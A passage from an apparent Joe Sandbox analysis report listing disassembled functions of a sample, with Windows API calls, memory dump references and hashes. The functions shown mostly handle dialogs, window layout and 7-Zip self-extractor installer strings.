                                                                                                                                                                                                                                                • CoCreateInstance.OLE32(00414C34,00000000,00000001,00414808,00000000), ref: 00408277
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00408294
                                                                                                                                                                                                                                                • IsWindow.USER32(00000000), ref: 00408297
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 004082A7
                                                                                                                                                                                                                                                • EnableWindow.USER32(00000000), ref: 004082AA
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000004B5), ref: 004082BE
                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 004082C1
                                                                                                                                                                                                                                                  • Part of subcall function 00407134: GetDlgItem.USER32(?,000004B6), ref: 00407142
                                                                                                                                                                                                                                                  • Part of subcall function 00407B33: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00407B6D
                                                                                                                                                                                                                                                  • Part of subcall function 00407B33: GetDlgItem.USER32(?,000004B8), ref: 00407B8B
                                                                                                                                                                                                                                                  • Part of subcall function 00407B33: SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00407B9D
                                                                                                                                                                                                                                                  • Part of subcall function 00407B33: wsprintfW.USER32 ref: 00407BBB
                                                                                                                                                                                                                                                  • Part of subcall function 00407B33: ??3@YAXPAX@Z.MSVCRT(?), ref: 00407C53
                                                                                                                                                                                                                                                  • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                                                                                                                                                                                                                                  • Part of subcall function 00407D06: LoadIconW.USER32(00000000), ref: 00407D33
                                                                                                                                                                                                                                                  • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000032), ref: 00407D43
                                                                                                                                                                                                                                                  • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000031), ref: 00407D48
                                                                                                                                                                                                                                                  • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                                                                                                                                                                                                                                  • Part of subcall function 00407D06: LoadImageW.USER32(00000000), ref: 00407D54
                                                                                                                                                                                                                                                  • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                                                                                                                                                                                                                                  • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                                                                                                                                                                                                                                  • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E76
                                                                                                                                                                                                                                                  • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E92
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Item$Window$MessageSend$System$EnableHandleLoadLongMenuMetricsModuleShow$??3@CreateFocusIconImageInstanceTimerUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 855516470-0
                                                                                                                                                                                                                                                • Opcode ID: f96aa9b93e1fd9714dbcbc8c2c582c1e46f74a713c41b2300bd45d2dcf84ac32
                                                                                                                                                                                                                                                • Instruction ID: 3ce0214ef3d03b0ee840dd4ab9c121ae631e901bc0d6870238ad5b6e85178a64
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f96aa9b93e1fd9714dbcbc8c2c582c1e46f74a713c41b2300bd45d2dcf84ac32
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 014174B0644748ABDA206F65DD49F5B7BADEB40B05F00847DF552A62E1CB79B800CA1C
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,hAA,00000000), ref: 004030F6
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,hAA,00000000), ref: 004030FE
                                                                                                                                                                                                                                                • strncmp.MSVCRT ref: 004031F1
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00403255
                                                                                                                                                                                                                                                • lstrcmpW.KERNEL32(?,SetEnvironment,00000000), ref: 00403273
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(0040414C,?), ref: 00403347
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ??3@$lstrcmpstrncmp
                                                                                                                                                                                                                                                • String ID: GUIFlags$MiscFlags$SetEnvironment$hAA${\rtf
                                                                                                                                                                                                                                                • API String ID: 2881732429-172299233
                                                                                                                                                                                                                                                • Opcode ID: 436b0b5fdcd0fc7850317bda0c1040a654aafe726af0558e82b6743448b11ef5
                                                                                                                                                                                                                                                • Instruction ID: da55d09168dcf28f6e950782b6654b171f18f9ca5632fa18d2c46afc5d57570a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 436b0b5fdcd0fc7850317bda0c1040a654aafe726af0558e82b6743448b11ef5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 23819D31900218ABDF11DFA1CD55BEE7B78AF14305F1040ABE8017B2E6DB78AB05DB59
                                                                                                                                                                                                                                                APIs
• GetDlgItem.USER32(?,000004B3), ref: 00406A69
• GetWindowLongW.USER32(00000000,000000F0), ref: 00406A6E
• GetDlgItem.USER32(?,000004B4), ref: 00406AA5
• GetWindowLongW.USER32(00000000,000000F0), ref: 00406AAA
• GetSystemMetrics.USER32(00000010), ref: 00406B0B
• GetSystemMetrics.USER32(00000011), ref: 00406B11
• GetSystemMetrics.USER32(00000008), ref: 00406B18
• GetSystemMetrics.USER32(00000007), ref: 00406B1F
• GetParent.USER32(?), ref: 00406B43
• GetClientRect.USER32(00000000,?), ref: 00406B55
• ClientToScreen.USER32(?,?), ref: 00406B68
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00406BCE
• GetClientRect.USER32(?,?), ref: 00406C55
• ClientToScreen.USER32(?,?), ref: 00406B71
  • Part of subcall function 0040690F: GetDlgItem.USER32(?,?), ref: 0040691B
• GetSystemMetrics.USER32(00000008), ref: 00406CD6
• GetSystemMetrics.USER32(00000007), ref: 00406CDD
  • Part of subcall function 00406A18: GetDlgItem.USER32(?,?), ref: 00406A36
  • Part of subcall function 00406A18: SetWindowPos.USER32(00000000), ref: 00406A3D
Memory Dump Source
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
Similarity
• API ID: MetricsSystem$ClientItemWindow$LongRectScreen$Parent
• String ID:
• API String ID: 747815384-0
• Opcode ID: bdc5cc6ef77edd437f37f749138dc65a224d6988716d71e8386f1ae5cf91717f
• Instruction ID: 701d8c843d4ec3579feae24e97f284edc15b0bac0439a5efdbaa5111af673c9b
• Opcode Fuzzy Hash: bdc5cc6ef77edd437f37f749138dc65a224d6988716d71e8386f1ae5cf91717f
• Instruction Fuzzy Hash: 7B912D71A00209AFDB14DFB9CD85AEEB7F9EF48704F148529E642F6290D778E9008B64
APIs
• GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
• LoadIconW.USER32(00000000), ref: 00407D33
• GetSystemMetrics.USER32(00000032), ref: 00407D43
• GetSystemMetrics.USER32(00000031), ref: 00407D48
• GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
• LoadImageW.USER32(00000000), ref: 00407D54
• SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
• SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
• GetWindow.USER32(?,00000005), ref: 00407E76
• GetWindow.USER32(?,00000005), ref: 00407E92
• GetWindow.USER32(?,00000005), ref: 00407EAA
• GetModuleHandleW.KERNEL32(00000000,00000065,000004B4,00000000,000004B3,00000000,000004B2,?,000004B7,?,?,?,?,?,0040803E), ref: 00407F0A
• LoadIconW.USER32(00000000), ref: 00407F0D
• GetDlgItem.USER32(?,000004B1), ref: 00407F28
• SendMessageW.USER32(00000000), ref: 00407F2F
  • Part of subcall function 0040725A: GetDlgItem.USER32(?,?), ref: 00407264
  • Part of subcall function 0040725A: GetWindowTextLengthW.USER32(00000000), ref: 0040726B
  • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
  • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
Similarity
• API ID: Window$HandleItemLoadMessageModuleSend$IconMetricsSystem$ImageLengthShowText
• String ID:
• API String ID: 1889686859-0
• Opcode ID: 54e99e0b53345dbf389ae49fdb6e6d7c6227533794aadf34278c182137d853b4
• Instruction ID: b6a50195b8a608de49edc5b96f3e83ee8a9b90890169e94b1220211b89b9884f
• Opcode Fuzzy Hash: 54e99e0b53345dbf389ae49fdb6e6d7c6227533794aadf34278c182137d853b4
• Instruction Fuzzy Hash: E861D47064C7096AE9257B61DC4AF3B3699AB40B05F10447FF642B92D2DBBCBC0056AF
APIs
• GetParent.USER32(?), ref: 00406F45
• GetWindowLongW.USER32(00000000), ref: 00406F4C
• DefWindowProcW.USER32(?,?,?,?), ref: 00406F62
• CallWindowProcW.USER32(?,?,?,?,?), ref: 00406F7F
• GetSystemMetrics.USER32(00000031), ref: 00406F91
• GetSystemMetrics.USER32(00000032), ref: 00406F98
• GetWindowDC.USER32(?), ref: 00406FAA
• GetWindowRect.USER32(?,?), ref: 00406FB7
• DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 00406FEB
• ReleaseDC.USER32(?,00000000), ref: 00406FF3
Similarity
• API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
• String ID:
• API String ID: 2586545124-0
• Opcode ID: 25d202db14ae47cc7765131eef640a3ba3c2163a3dcc7105130798770ded3a1b
• Instruction ID: b1ff7c23223d170b9333fa97acec74f2c9230ee3eabfe87d0be763292bfdf634
• Opcode Fuzzy Hash: 25d202db14ae47cc7765131eef640a3ba3c2163a3dcc7105130798770ded3a1b
• Instruction Fuzzy Hash: 8E210C7650021ABFCF01AFA8DD48DDF7F69FB08351F008565FA15E21A0C775EA209B64
APIs
• GetDlgItem.USER32(?,000004B3), ref: 0040678E
• SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004067A1
• GetDlgItem.USER32(?,000004B4), ref: 004067AB
• SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004067B3
• SendMessageW.USER32(?,00000401,?,00000000), ref: 004067C3
• GetDlgItem.USER32(?,?), ref: 004067CC
• SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 004067D4
• GetDlgItem.USER32(?,?), ref: 004067DD
• SetFocus.USER32(00000000,?,000004B4,75920E50,00407E06,000004B4,000004B3,00000000,000004B4,00000000,000004B2,?,000004B7), ref: 004067E0
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ItemMessageSend$Focus
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3946207451-0
                                                                                                                                                                                                                                                • Opcode ID: ad16f172208785dca513fa64c118104ef693669a3ac6e088fd96c23032a45483
                                                                                                                                                                                                                                                • Instruction ID: e7a8c5b21de344c7c4c5496bf688f1d5cc3ba414acf11b32f4788b893cc62525
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad16f172208785dca513fa64c118104ef693669a3ac6e088fd96c23032a45483
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6FF04F712403087BEA212B61DD86F5BBA6EEF81B45F018425F340650F0CBF7EC109A28
APIs
• ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,00000000), ref: 0040C603
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
Similarity
• API ID: ??3@
• String ID: IA$IA$IA$IA$IA$IA
• API String ID: 613200358-3743982587
• Opcode ID: 6e54149e8c3d77333b16b378dc95c38791a09178c73359331ff936fd258cd747
• Instruction ID: 4cebfcab61734def35128a955d6a3e34031d8899c11ca8f9bd2aeb72941b6852
• Opcode Fuzzy Hash: 6e54149e8c3d77333b16b378dc95c38791a09178c73359331ff936fd258cd747
• Instruction Fuzzy Hash: D2221671900248DFCB24EF65C8D09EEBBB5FF48304F50852EE91AA7291DB38A945CF58
APIs
• ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,00417788,00000000,SetEnvironment), ref: 00408479
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
Similarity
• API ID: ??3@
• String ID: BeginPrompt$ErrorTitle$FinishMessage$HelpText$SetEnvironment$WarningTitle
• API String ID: 613200358-994561823
• Opcode ID: 971dcdd12a827a4034ed94f9ba1d623efd1f14b2bcca4d73e06b44b648e667ed
• Instruction ID: 5566f9f9667118f06bc812855c9affabb63102f3a10b3971892d5eca1131561f
• Opcode Fuzzy Hash: 971dcdd12a827a4034ed94f9ba1d623efd1f14b2bcca4d73e06b44b648e667ed
• Instruction Fuzzy Hash: CA51D47080420AAACF24AB559E85AFB7774EB20348F54443FF881722E1EF7D5D82D64E
APIs
• memcpy.MSVCRT(?,00417410,00000160), ref: 00406DD1
• SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 00406DF0
• GetDC.USER32(00000000), ref: 00406DFB
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00406E07
• MulDiv.KERNEL32(?,00000048,00000000), ref: 00406E16
• ReleaseDC.USER32(00000000,?), ref: 00406E24
• GetModuleHandleW.KERNEL32(00000000), ref: 00406E4C
• DialogBoxIndirectParamW.USER32(00000000,?,?,Function_0000667A), ref: 00406E81
Memory Dump Source
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
Similarity
• API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystemmemcpy
• String ID:
• API String ID: 2693764856-0
• Opcode ID: e70a94c77e8458ae7b0f85d98e5dff18e09bef3a98047e8bed90a0db42bf0d7e
• Instruction ID: b2c1943609947f3a034a1f42a4fd453b3666a2b5c4d4ccfd9a1c2059c5c1cb6f
• Opcode Fuzzy Hash: e70a94c77e8458ae7b0f85d98e5dff18e09bef3a98047e8bed90a0db42bf0d7e
• Instruction Fuzzy Hash: C32184B5500218BFDB215F61DC45EEB7B7CFB08746F0040B6F609A1190D7748E948B65
APIs
• GetDC.USER32(?), ref: 0040696E
• GetSystemMetrics.USER32(0000000B), ref: 0040698A
• GetSystemMetrics.USER32(0000003D), ref: 00406993
• GetSystemMetrics.USER32(0000003E), ref: 0040699B
• SelectObject.GDI32(?,?), ref: 004069B8
• DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 004069D3
• SelectObject.GDI32(?,?), ref: 004069F9
• ReleaseDC.USER32(?,?), ref: 00406A08
Memory Dump Source
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
Similarity
• API ID: MetricsSystem$ObjectSelect$DrawReleaseText
• String ID:
• API String ID: 2466489532-0
• Opcode ID: 3371c90df87af61a96ab0a4f5adfc31794890a389d4733c3cd0e84d47817aa4d
• Instruction ID: 7c755332e1b278278a0584394201b19561512224090c74d51841a9ad660c27ee
• Opcode Fuzzy Hash: 3371c90df87af61a96ab0a4f5adfc31794890a389d4733c3cd0e84d47817aa4d
• Instruction Fuzzy Hash: 6B216871900209EFCB119F65DD84A8EBFF4EF08321F10C46AE559A72A0C7359A50DF40
APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00407B6D
• GetDlgItem.USER32(?,000004B8), ref: 00407B8B
• SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00407B9D
• wsprintfW.USER32 ref: 00407BBB
• ??3@YAXPAX@Z.MSVCRT(?), ref: 00407C53
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
Similarity
• API ID: ??3@ItemMessageSendUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
• String ID: %d%%
• API String ID: 3753976982-1518462796
• Opcode ID: 0b792d7adb6174ba2d50e5ca9cf87896ffea0db59519718aa7dbff65f529ef39
• Instruction ID: b955b8041d8a67620c3180d4911c799512bd6939d195f5b55c3092177650065a
• Opcode Fuzzy Hash: 0b792d7adb6174ba2d50e5ca9cf87896ffea0db59519718aa7dbff65f529ef39
• Instruction Fuzzy Hash: 1D31D371904208BBDB11AFA0CC45EDA7BB9EF48708F10847AFA42B61E1D779B904CB59
APIs
• lstrlenW.KERNEL32(hAA,00000020,?,?,00405838,?,?,?,00000000,?), ref: 004040A4
  • Part of subcall function 00401A85: CharUpperW.USER32(?,7591E0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
  • Part of subcall function 00401A85: CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00404156
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 0040415E
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 0040416D
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00404175
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
Similarity
• API ID: ??3@$CharUpper$lstrlen
• String ID: hAA
• API String ID: 2587799592-1362906312
• Opcode ID: f1afb06a12cfea52e195ddd9e8ddb158cdff932f9735d488ba252034b153affa
• Instruction ID: 7f7e13310b21401de90169bcc26cd057e2afddf23eedd5de54135d69024cf91c
• Opcode Fuzzy Hash: f1afb06a12cfea52e195ddd9e8ddb158cdff932f9735d488ba252034b153affa
• Instruction Fuzzy Hash: D7212772D40215AACF20ABA4CC46AEB77B9DF90354F10407BEB41BB2E1E7789D848658
APIs
• ??3@YAXPAX@Z.MSVCRT(?,00000000,00000001,00000000,00000000,00000001,?,00000000), ref: 00404D3E
• ??3@YAXPAX@Z.MSVCRT(?,?,?,004054CC,?,;!@InstallEnd@!,004054CC,;!@Install@!UTF-8!,00417400,00000000,00000001,?,00000000), ref: 00404DA0
• ??3@YAXPAX@Z.MSVCRT(?,?,?,004054CC,?,;!@InstallEnd@!,004054CC,;!@Install@!UTF-8!,00417400,00000000,00000001,?,00000000), ref: 00404DB8
  • Part of subcall function 00403354: lstrlenW.KERNEL32(00404AC6,?,?,00000000,?,?,?,?,00404AC6,?), ref: 00403361
  • Part of subcall function 00403354: GetSystemTimeAsFileTime.KERNEL32(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 004033D7
  • Part of subcall function 00403354: GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004033DE
  • Part of subcall function 00403354: ??3@YAXPAX@Z.MSVCRT(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 0040349D
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
Similarity
• API ID: ??3@$FileTime$AttributesSystemlstrlen
• String ID: 03A$;!@Install@!UTF-8!$;!@InstallEnd@!
• API String ID: 4038993085-2279431206
• Opcode ID: 1e5f1ef11ab3d9e84330ff60a8d60345b5fdf25d940142a54a900a3d947b53ea
• Instruction ID: 637b7b13a9bcd1d52ea1019587bfa2fb4435f6835f564ae220b3123002230846
• Opcode Fuzzy Hash: 1e5f1ef11ab3d9e84330ff60a8d60345b5fdf25d940142a54a900a3d947b53ea
• Instruction Fuzzy Hash: CE312D71D0021EEACF05EF92CD429EEBBB4BF44318F10042BE911762E1DB785649DB98
APIs
• EndDialog.USER32(?,00000000), ref: 00407579
• KillTimer.USER32(?,00000001), ref: 0040758A
• SetTimer.USER32(?,00000001,00000000,00000000), ref: 004075B4
• SuspendThread.KERNEL32(00000290), ref: 004075CD
• ResumeThread.KERNEL32(00000290), ref: 004075EA
• EndDialog.USER32(?,00000000), ref: 0040760C
Memory Dump Source
• Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
Similarity
• API ID: DialogThreadTimer$KillResumeSuspend
• String ID:
• API String ID: 4151135813-0
• Opcode ID: fa37b7d0569be928e5d0aecc9653dabfd5de706af621d680b5378aa8e85f3b57
• Instruction ID: ebb94c5c4675b2e6542c2b2cb7d5652cccd5624f9a00d71f737e39ca63bd9789
• Opcode Fuzzy Hash: fa37b7d0569be928e5d0aecc9653dabfd5de706af621d680b5378aa8e85f3b57
• Instruction Fuzzy Hash: 9811BF70A08618BBD7212F15EE849E77BBDFB00756B00843AF523A05A0CB39BD00DA1D
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,0000002B,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404E85
                                                                                                                                                                                                                                                  • Part of subcall function 00404343: ??3@YAXPAX@Z.MSVCRT(?,?,?,004177C4,004177C4,?,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 004043B6
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,0000002B,004177C4,004177C4,00000000,0000002B,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404EAB
                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00404EBC
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
